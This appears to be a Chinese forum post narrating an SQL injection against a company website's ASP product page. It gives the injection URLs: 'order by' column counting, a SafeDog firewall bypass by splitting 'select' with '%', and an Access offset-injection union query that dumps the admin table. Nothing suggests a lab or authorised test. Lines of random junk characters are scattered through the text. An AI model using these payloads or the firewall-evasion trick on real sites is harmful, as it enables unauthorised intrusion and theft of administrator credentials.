打开网站,一个企业站。
( {5 N5 y. `* [8 W; _4 R$ p" q4 r6 p6 n9 i+ D# I" h8 l
" ^# A/ \$ L5 ?+ J7 ~ r顺手加个admin
8 m* |, j5 l2 d0 r. x# p: I- S$ B# x: o
, t5 O9 W# p0 l5 `% _/ R" ^默认后台。
- ~2 k$ L/ i: H) `! G4 ~回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
9 U$ ?8 `3 K& K- i; G/ o$ ^- Q
, E! X! T* s2 q( p4 u- Z( _
5 L$ d8 @. E- Z t# l0 _' g: y+ j1 h% P0 [6 b+ J9 Z
所以就不用御剑扫了,待会直接封IP。, S8 H: w" d+ I( X, Y. B ~- \! M- P
: `$ j- r7 }( J" Y2 h: B
用order by语句判断是否存在注入。
! j- m- {* H8 X; ^5 Ehttp://www.xxx.com /product_show.asp?id=997 order by 1
5 u* S1 R1 x* n3 {6 M3 ~$ Thttp://www.xxx.com /product_show.asp?id=997 order by 100
2 p C! g: c6 _现在存在注入,经测试后发现是9个字段。
6 I8 @1 ], `& E) r8 o 4 A% r+ E) f4 q& T/ G- T' s
接下来进行联合查询,猜是否存在admin表。 b0 M+ K/ V5 U8 |8 A' ]
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。9 J/ l7 w5 P0 d5 T; N
, b. g, Y1 f9 L3 s
3 Y. b* g3 Y1 [; b7 l
# n: a, S8 x# i" n6 C7 H# e4 H) X. D在select中间加个%,se%lect绕过安全狗。
$ g1 O; m( Q e P, ?2 O# ` Q1 L" ^
6 [3 x4 U! j6 A发现存在admin表,然后开始手工猜常用的字段。
2 r' J6 ~5 K- `6 O4 ?, ?纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。, [. \: p$ k: Z; g5 d) N8 d
! i7 u' Y8 S w: k [突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
% j& J& ?4 R; E( X" a. _$ C
5 ]9 z' c4 V* y' k' A+ \科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
# N# [0 X1 q' c$ V5 W/ W* k: Nhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
5 Y9 S `" O) a+ x6 a" m7 R/ o好了,敏感内容出显了。- v! @7 g8 S( E \& T
' d5 b' I+ n0 d5 B% F' ^0 u9 V2 ~
Q3 [: e* ^2 n7 K0 u
6 v5 H' C0 u; B# j& I7 g |